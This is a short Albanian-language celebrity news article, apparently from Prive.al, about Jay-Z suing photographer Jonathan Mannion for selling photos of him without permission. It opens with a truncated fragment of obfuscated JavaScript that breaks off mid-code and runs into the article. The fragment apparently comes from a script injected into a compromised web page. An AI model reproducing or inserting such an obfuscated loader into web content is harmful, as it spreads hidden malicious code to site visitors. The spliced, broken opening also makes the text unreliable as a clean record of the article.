;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Jay Z padit fotografin për keqpërdorimin e fotove të tij

By

 

Reperi amerikan Jay-Z ka ngritur një proces gjyqësor kundër fotografit Jonathan Mannion, të cilin e ka akuzuar për shitjen e fotove të tij, pa lejen e reperit për publikimin e fotove.

Fotografi Jonathan, e ka shfrytëzuar këtë rast për përfitime të tij personale.

Jay-Z emri i vërtetë i të cilit është Shawn Carter, punësoi Mannion në mesin e viteve nëntëdhjetë, si fotograf personal të tij.

Në një nga ato fotografi shihet reperi i veshur me një kostum dhe kapelë që mbante një puro në dorë.

Jay-Z ka kërkuar që të ndalohet ky veprim nga ai, dhe kërkon t’i marrë të hollat që ka fituar nga shitja e tyre.

Akuza e tij është se fotografi ka menduar që mund të bënte çdo gjë më ato imazhe pa të drejtë ligjore për ta bërë këtë, vetëm sepse i ka realizuar ato.

Mannion, vetëm një foto të reperit e ka shitur mijëra dollarë. /Prive.al

Artikuj të ngjashëm